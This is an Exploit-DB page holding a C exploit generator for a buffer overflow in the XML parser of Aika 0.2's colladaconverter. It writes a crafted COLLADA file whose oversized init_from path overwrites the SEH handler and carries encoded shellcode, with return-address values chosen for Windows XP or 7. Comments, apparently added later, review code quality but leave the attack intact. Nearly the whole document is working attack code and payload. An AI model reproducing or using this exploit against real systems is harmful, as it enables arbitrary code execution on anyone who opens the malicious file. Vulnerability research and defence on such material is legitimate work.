Aika 0.2 – colladaconverter Xml Parsing Buffer Overflow

  • 作者: isciurus
    日期: 2011-09-12
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/17820/
  • /*
    //////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
    	# Exploit Title: Aika colladaconverter buffer overflow exploit
    	# Date: 09/11/2011
    	# Author: isciurus
    	# Software Link: http://aika.googlecode.com/files/aika-v02.zip
    	# Version: 0.2
    	# Tested on: Windows 7 x64
     
    This program is free software: you can redistribute it and/or modify
    it under the terms of the GNU General Public License as published by
    the Free Software Foundation, either version 3 of the License, or
    (at your option) any later version.
     
    This program is distributed in the hope that it will be useful,
    but WITHOUT ANY WARRANTY; without even the implied warranty of
    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
    GNU General Public License for more details.
     
    You should have received a copy of the GNU General Public License
    along with this program. If not, see <http://www.gnu.org/licenses/gpl-3.0.html>.
     
    //////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
    */
    
    #include <stdio.h>
    #include <windows.h>
    #include <stdlib.h>
    #include "string.h"
    
    /* Opaque, printable-ASCII-encoded payload; the <comments> element in the
     * xml template below names the encoder it was produced with. main() copies
     * sizeof - 1 of these bytes (i.e. without the terminating NUL) over the
     * leading run of 'S' placeholder bytes inside the first <init_from> path of
     * xml, and rejects the array if sizeof exceeds 644. Reviewed here as opaque
     * data only; nothing in this file decodes or interprets it. */
    char printableASCIIShellcode[] = 	// encoded 499 bytes
    	"WUQQUj3hKzJYSaRYjVCX4VGRH4z0BfXRQPPZjQX4QP2BM0BMX2Ai0BMXYZPOCKHG" // will be injected inside the file path ---------
    	"OHOCHGCKHKkAgFCBMGKJEA3Ag2Bg0BgABE94ku2QmAiAszHthbzMIMQ8Uz9TFQWC" //|
    	"GDNW6jYeJ8l47kSCPlKPRZljwLskRH6RQ0OiKjRENz4TUYHTfu6rjMTi1NAjGwMF" //|
    	"RHxIjxgzoZnVXlGIXJbCJYhxKHXKvjyFXDDLbNydxzXT3vTJdfa7Hpp3VM1jUOVv" //|
    	"UJYuPT3vkOQIPYGxa6Rk6NOaV9PEH56Mrrz5ZSPLOAvKIsFOCbfqWBRXPCNWSmJf" //|
    	"EVCXNoYNR9oDOaWoykz1Ev3TxcSHQz4ZOOLxlGBjsDGWGJs1EOCNqaAAOWHAMWCx" //|
    	"JEFIrTQ70vEFELaCIPPAPP0GUSmGfq1ZioUNQQATGCISZuJHNKRnlC3baNSAvIRO" //|
    	"HLvt4zVFHLkLxBQR5XsKpEN90RgdBZlNmISLELGsEL0myBVKzJY"; //|
     //|
    /* COLLADA 1.4.1 document template that main() writes verbatim (minus the
     * terminating NUL) to the output path. Three regions are placeholders that
     * main() patches in place with strstr + strncpy before writing: the run of
     * 'S' bytes in the first <init_from> path (receives printableASCIIShellcode
     * above) and the 6-byte markers ADDR_1 and ADDR_2 (each receives a 6-byte
     * percent-encoded value selected by the OS answer read from stdin). Every
     * other byte -- including the literal E:\aika\ path prefixes, the embedded
     * tab characters in the closing </init_from> tags, and the "utf8" encoding
     * attribute (not the registered name "utf-8") -- is emitted exactly as written
     * here. The adjacent string literals are concatenated by the compiler into one
     * array, so the line breaks below are not part of the document. */
    char xml[] = //|
    	"<?xml version=\"1.0\" encoding=\"utf8\"?>"//|
    	"<COLLADA xmlns=\"http://www.collada.org/2005/11/COLLADASchema\" version=\"1.4.1\">" //|
    "<asset>"//|
    "<contributor>"//|
    "<author>isciurus</author>"//|
    "<comments>The shellcode encoded with http://www.exploit-db.com/exploits/13286/</comments>" // |
    "</contributor>" //|
    "<created>2011-09-04T22:29:59Z</created>"//|
    "<modified>2011-09-04T22:29:59Z</modified>"//|
    "<unit meter=\"0.01\" name=\"centimeter\"/>" //|
    "<up_axis>Y_UP</up_axis>"//|
    "</asset>" //|
    "<library_cameras>"//|
    "<camera id=\"cameraShape1\" name=\"cameraShape1\">" //|
    "<optics>" //|
    "<technique_common>" //|
    "<perspective>"//|
    "<yfov>37.8492</yfov>" //|
    "<aspect_ratio>1.5</aspect_ratio>" //|
    "<znear>1</znear>" //|
    "<zfar>10000</zfar>" //|
    "</perspective>" //|
    "</technique_common>"//|
    "</optics>"//|
    "</camera>"//|
    "</library_cameras>" //|
    "<library_lights></library_lights>"//|
    "<library_images>" //|
    "<image id=\"file2\" name=\"file2\" depth=\"1\">"//|
    "<init_from>E:\\aika\\"//<---------------------------
    	"SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS"
    "SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS"
    "SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS"
    "SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS"
    "SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS"
    "SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS"
    "SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS"
    "SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS"
    "SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS"
    "SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS"
    "SSSSSSSSSSSSSSADDR_1AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
    	// ^
    	// | 
    	//------------------------------------------------- the shellcode will be copied at this address
    "AAAAA"
    	"		</init_from>"
    "</image>"
    	"	<image id=\"file3\" name=\"file3\" depth=\"1\">"
    "<init_from>E:\\aika\\"
    	"BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB" 
    	"BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB"
    	"BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB"
    	"BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB"
    	"BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB"
    	"BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB"
    	"BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB"
    	"BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB"
    	"BBBBBBBBADDR_2AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
    	// ^
    	// | 
    	//-------------------------------------------------------- these bytes will overwrite SEH handler
    	"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
    	"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
    	"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
    	"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" // this part forces the application to write outside							
    	"AAAAAAAAAAAAAAAAAAAA"	// the stack and triggers AV exception		
    	"		</init_from>"
    "</image>"
    "</library_images>"
    "<library_materials>"
    "<material id=\"blinn3\" name=\"blinn3\">"
    "<instance_effect url=\"#blinn3-fx\"/>"
    "</material>"
    "</library_materials>"
    "<library_geometries>"
    "<geometry id=\"LOD3spShape-lib\" name=\"LOD3spShape\">"
    "<mesh>"
    "<source id=\"LOD3spShape-lib-positions\" name=\"position\">"
    "<technique_common>"
    "<accessor count=\"2108\" offset=\"0\" source=\"#LOD3spShape-lib-positions-array\" stride=\"3\">"
    "<param name=\"X\" type=\"float\"/>"
    "<param name=\"Y\" type=\"float\"/>"
    "<param name=\"Z\" type=\"float\"/>"
    "</accessor>"
    "</technique_common>"
    "</source>"
    "<source id=\"LOD3spShape-lib-normals\" name=\"normal\">"
    "<technique_common>"
    "<accessor count=\"2290\" offset=\"0\" source=\"#LOD3spShape-lib-normals-array\" stride=\"3\">"
    "<param name=\"X\" type=\"float\"/>"
    "<param name=\"Y\" type=\"float\"/>"
    "<param name=\"Z\" type=\"float\"/>"
    "</accessor>"
    "</technique_common>"
    "</source>"
    "<source id=\"LOD3spShape-lib-map1\" name=\"map1\">"
    "<technique_common>"
    "<accessor count=\"2277\" offset=\"0\" source=\"#LOD3spShape-lib-map1-array\" stride=\"2\">"
    "<param name=\"S\" type=\"float\"/>"
    "<param name=\"T\" type=\"float\"/>"
    "</accessor>"
    "</technique_common>"
    "</source>"
    "<vertices id=\"LOD3spShape-lib-vertices\">"
    "<input semantic=\"POSITION\" source=\"#LOD3spShape-lib-positions\"/>"
    "</vertices>"
    "<triangles count=\"4212\" material=\"blinn3SG\">"
    "<input offset=\"0\" semantic=\"VERTEX\" source=\"#LOD3spShape-lib-vertices\"/>"
    "<input offset=\"1\" semantic=\"NORMAL\" source=\"#LOD3spShape-lib-normals\"/>"
    "<input offset=\"2\" semantic=\"TEXCOORD\" source=\"#LOD3spShape-lib-map1\" set=\"0\"/>"
    "<p>375</p>"
    "</triangles>"
    "</mesh>"
    "</geometry>"
    "</library_geometries>"
    "<scene>"
    "<instance_visual_scene url=\"#VisualSceneNode\"/>"
    "</scene>"
    	"</COLLADA>";
    
    /*
     * Writes the crafted COLLADA document (global `xml`) to the path given in
     * argv[1], after patching its placeholders in place:
     *   - the leading run of 'S' bytes receives `printableASCIIShellcode`;
     *   - the 6-byte markers "ADDR_1" and "ADDR_2" each receive a 6-byte
     *     percent-encoded value chosen by the OS answer read from stdin.
     *
     * Returns 0 on every path, including the usage, length-check, fopen and
     * fwrite error paths, so the exit status never distinguishes failure from
     * success (review: a non-zero return on error would let callers detect it).
     * Control also runs off the closing brace with no return statement; C99 and
     * later imply `return 0;` for main, C89 leaves the status undefined.
     */
    int main(int argc, char **argv)
    {
    	FILE *xml_file;
    	char win7;		/* 1 for Windows 7, 0 for Windows XP; set by the prompt loop below */
    	char *offset;	/* cursor into the global xml buffer, as returned by strstr */
    	char *ll;		/* unused */
    
    	if(argc < 2)
    	{
    		printf("\nUsage: aika_bof <malformed_collada_xml_path>");
    		return 0;
    	}
    
    	/* sizeof counts the terminating NUL, so this accepts a payload of up to
    	 * 643 bytes. The 644 presumably equals the length of the 'S' placeholder
    	 * run in xml (10 lines of 63 plus 14) -- verify against the array before
    	 * changing either side, since a longer payload would overwrite the bytes
    	 * that follow the run. */
    	if(sizeof(printableASCIIShellcode) > 644)
    	{
    		printf("\nSorry, the shellcode is too long, 644 chars is maximum");
    		return 0;
    	}
    	
    	/* Prompt until 'x'/'X' or '7' is read. getchar() returns one byte per
    	 * call, so after an unrecognised key the trailing newline is read on the
    	 * next iteration and reported as a second "Unknown OS version". At end of
    	 * input getchar() keeps returning EOF, which matches neither key, so the
    	 * loop never exits. */
    	while(1)
    	{
    		char os;
    
    		printf("\nChoose OS version ([X] for Windows XP, [7] for Windows 7):");
    		/* tolower() is declared in <ctype.h>, which is not among this file's
    		 * includes; presumably it arrives via <windows.h> on the tested
    		 * toolchain -- confirm, as an implicit declaration is an error in
    		 * modern C. getchar()'s int result (EOF is -1) is narrowed to char. */
    		os = tolower(getchar());
    		
    		if(os == 'x')
    		{
    			win7 = 0;
    			break;
    		}
    		else if(os == '7')
    		{
    			win7 = 1;
    			break;
    		}
    		else
    		{
    			printf("\nUnknown OS version");
    		}
    	}
    
    	printf("\n[*] Injecting the shellcode into the xml...");
    
    	/* In-place overwrite of the 'S' placeholder run: strncpy with a length
    	 * of sizeof - 1 copies exactly the payload bytes and no NUL, so the
    	 * remainder of xml after the payload stays intact. strstr's result is
    	 * not checked for NULL; it is found in the literal as written, but any
    	 * edit that removes or shortens the marker turns this into a write
    	 * through a null pointer. */
    	offset = strstr(xml, "SSSSSSSSSSSSSSSSSSSSSSSSSSSS");
    	strncpy(offset, printableASCIIShellcode, sizeof(printableASCIIShellcode) - 1);
    	
    	/* Both markers are 6 bytes and each replacement is 6 bytes (sizeof - 1
    	 * drops the NUL), so these are exact in-place substitutions that leave the
    	 * surrounding document unchanged. The two branches differ only in the last
    	 * byte of the value. Same unchecked-strstr caveat as above. */
    	if(win7 == 1)
    	{
    		offset = strstr(xml, "ADDR_1");
    		strncpy(offset, "%40%02", sizeof("%40%02") -1);
    		offset = strstr(xml, "ADDR_2");
    		strncpy(offset, "%40%02", sizeof("%40%02") -1);
    	}
    	else
    	{
    		offset = strstr(xml, "ADDR_1");
    		strncpy(offset, "%40%01", sizeof("%40%01") -1);
    		offset = strstr(xml, "ADDR_2");
    		strncpy(offset, "%40%01", sizeof("%40%01") -1);
    	}
    
    	printf("done");
    
    	/* sizeof(xml) is a size_t but is printed with %d: a format/argument
    	 * mismatch (undefined behaviour per the C standard); %zu is the matching
    	 * specifier. The count printed also includes the terminating NUL, one more
    	 * than the fwrite below actually writes. */
    	printf("\n[*] Writing %d bytes to %s...", sizeof(xml), argv[1]);
    	
    	/* Binary mode, so no newline translation alters the bytes on Windows.
    	 * The stream is never fclose()d: the data reaches disk only because
    	 * process exit flushes open streams, and any error at that flush is
    	 * not reported. */
    	xml_file = fopen(argv[1], "wb");
    	if(xml_file == NULL)
    	{
    		printf("\nerror while opening %s", argv[1]);
    		return 0;
    	}
    	
    	/* Write the document without its terminating NUL; a short write is
    	 * reported but the stream is still left open on that path too. */
    	if(fwrite(xml, 1, sizeof(xml) - 1, xml_file) != sizeof(xml) - 1)
    	{
    		printf("\nerror while writing into %s", argv[1]);
    		return 0;
    	}
    
    	printf("done");	
    }